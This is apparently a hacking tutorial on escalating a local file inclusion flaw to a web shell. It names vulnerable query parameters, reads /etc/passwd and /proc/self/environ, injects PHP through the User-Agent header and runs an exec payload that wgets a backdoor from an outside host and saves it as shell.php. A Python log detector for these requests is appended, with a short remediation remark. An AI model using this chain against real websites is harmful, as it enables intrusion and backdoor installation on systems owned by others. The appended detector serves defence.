
LFI TO SHELL WITH VIDEO TUT





Hello guys, I have already posted a tutorial on LFI to shell; you can see it here.
Today I'll post it again with a video.
Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks:


index.php?homepage=
index.php?page=
index.php?index2=

Requirements:

1) A Vulnerable Website
2) Remote shell ( http://www.sh3ll.org/egy.txt )
4) Mozilla Firefox

The first thing a hacker will do when looking for an LFI vulnerability is try to read the /etc/passwd file. If the file's contents are returned, a local file inclusion vulnerability is present in the website. The image below explains the whole story: "root" is the username, followed by "x" in the password field. The "x" means the password is shadowed, that is, it is stored in the /etc/shadow file, which is only accessible when you have root privileges.






Next the hacker will check for /proc/self/environ, so change your path to /proc/self/environ/. If the file exists, the /proc/self/environ/ page should look something like this; not all sites have it.



Once the local file inclusion vulnerability has been identified, the hacker will try to perform remote code execution and somehow gain further access. This can be done by uploading a PHP backdoor. A commonly used tool for that purpose is User Agent Switcher, which can be downloaded from the link above.



The hacker edits the user agent and changes its value to the following:

<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your User Agent is called).




After refreshing the website, he then searches for the keyword "disable_functions" (Ctrl+F search function):

disable_functions | no value | no value



The above row tells us that no PHP functions are disabled, so the website is vulnerable to remote code execution and the PHP backdoor can be uploaded. On finding that the website is vulnerable, he then tries to upload the shell by using the following command:

<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

The above code downloads a PHP backdoor in text form and saves it with a .php extension as shell.php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following:

 


Source: Hackerzadda (Note: All copies are made with the permission of the administrator, so no copyright law will be applied to us.)
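From the defender's side, the requests this walkthrough generates stand out in a web server access log. The Python sketch below is an added example, not part of the original post; it assumes the Apache/nginx combined log format, and the sample log lines, function names and finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
# Files the walkthrough reads through the include parameter, plus generic traversal.
SENSITIVE = ("/etc/passwd", "/proc/self/environ", "../")

SAMPLE_LOG = [  # constructed lines using documentation-only IP addresses
    '203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/15.0"',
    '198.51.100.23 - - [10/Oct/2012:13:56:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0 Firefox/15.0"',
    '198.51.100.23 - - [10/Oct/2012:13:57:44 +0000] "GET /index.php?page=%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?php phpinfo();?>"',
]


def classify(line):
    """Return a sorted list of finding labels for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = set()
    query = urlsplit(m["target"]).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded paths.
        decoded = unquote(value).replace("\\", "/").lower()
        if any(s in decoded for s in SENSITIVE):
            findings.add("lfi_path_in_parameter")
        if "/proc/self/environ" in decoded:
            findings.add("environ_include")
    # A legitimate browser User-Agent never carries a PHP open tag.
    if "<?" in m["agent"]:
        findings.add("php_code_in_user_agent")
    # Both halves in one request: the environ-injection step described above.
    if {"environ_include", "php_code_in_user_agent"} <= findings:
        findings.add("environ_injection_chain")
    return sorted(findings)


def scan(lines):
    """Return (client address, findings) for every line with at least one finding."""
    hits = []
    for line in lines:
        found = classify(line)
        if found:
            hits.append((line.split(" ", 1)[0], found))
    return hits
```

The underlying fix is to map the page parameter to an allowlist of known files instead of passing it to include, and to list command-execution functions such as exec in disable_functions.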
